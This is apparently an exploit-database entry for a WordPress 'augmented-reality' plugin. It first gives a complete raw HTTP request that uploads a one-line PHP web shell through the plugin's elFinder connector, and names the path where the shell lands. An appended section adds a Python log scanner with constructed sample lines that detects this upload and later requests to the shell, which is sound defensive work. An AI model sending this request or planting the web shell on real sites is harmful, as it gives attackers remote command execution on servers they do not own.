## https://sploitus.com/exploit?id=WPEX-ID:10457
```
POST /wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php HTTP/1.1
Host: 192.168.1.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42474892822150178483835528074
Content-Length: 737
Connection: close
Cookie: PHPSESSID=8940b45029f28b38e8339bae4dd10b18

-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="reqid"

1744f7298611ba
-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="cmd"

upload
-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="target"

l1_Lw
-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="upload[]"; filename="robbie3.php"
Content-Type: application/php

<?php system($_GET['cmd']); ?>
-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="mtime[]"

1597850374
-----------------------------42474892822150178483835528074--
```
The uploaded file ends up at:
/wp-content/plugins/augmented-reality/file_manager/robbie3.php
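
A detection sketch for web access logs, added here as an example and not part of the original entry: it flags POSTs to the connector path and any request for a PHP file under the `file_manager` directory shown above. The log lines are constructed samples in combined log format, and the function names and the extension list are assumptions.

```python
import re
from urllib.parse import unquote

# Paths taken from the request and the resulting file location shown on this page.
CONNECTOR = "/wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php"
UPLOAD_DIR = "/wp-content/plugins/augmented-reality/file_manager/"

# Combined log format: ip - user [time] "METHOD target PROTO" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Extensions commonly handed to the PHP interpreter (assumption; match your server config).
PHP_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)$")

def normalise(target):
    """Drop the query string, decode percent-escapes, collapse duplicate slashes."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path)

def scan(lines):
    """Return (reason, ip, method, path, status) for each suspicious request."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        path = normalise(m["target"])
        low = path.lower()  # compare case-insensitively; over-flagging is acceptable here
        hit = (m["ip"], m["method"], path, int(m["status"]))
        if m["method"] == "POST" and low == CONNECTOR:
            findings.append(("connector-post",) + hit)
        elif low.startswith(UPLOAD_DIR) and PHP_EXT_RE.search(low):
            findings.append(("php-in-upload-dir",) + hit)
    return findings

# Constructed sample lines (documentation IP ranges, made-up timestamps and file names).
P = "/wp-content/plugins/augmented-reality"
SAMPLE_LOG = [
    f'198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "POST {P}/vendor/elfinder/php/connector.minimal.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    f'198.51.100.7 - - [01/Jan/2024:10:00:30 +0000] "GET {P}/file_manager/sample.php?x=1 HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    f'192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET {P}/file_manager/model.glb HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    f'192.0.2.10 - - [01/Jan/2024:10:02:00 +0000] "GET /wp-content//plugins/augmented-reality/file_manager/S%61mple.PHP HTTP/1.1" 404 0 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any `php-in-upload-dir` hit with a 200 status is worth checking against the files actually present in that directory, since the plugin's file manager has no reason to serve executable PHP from it.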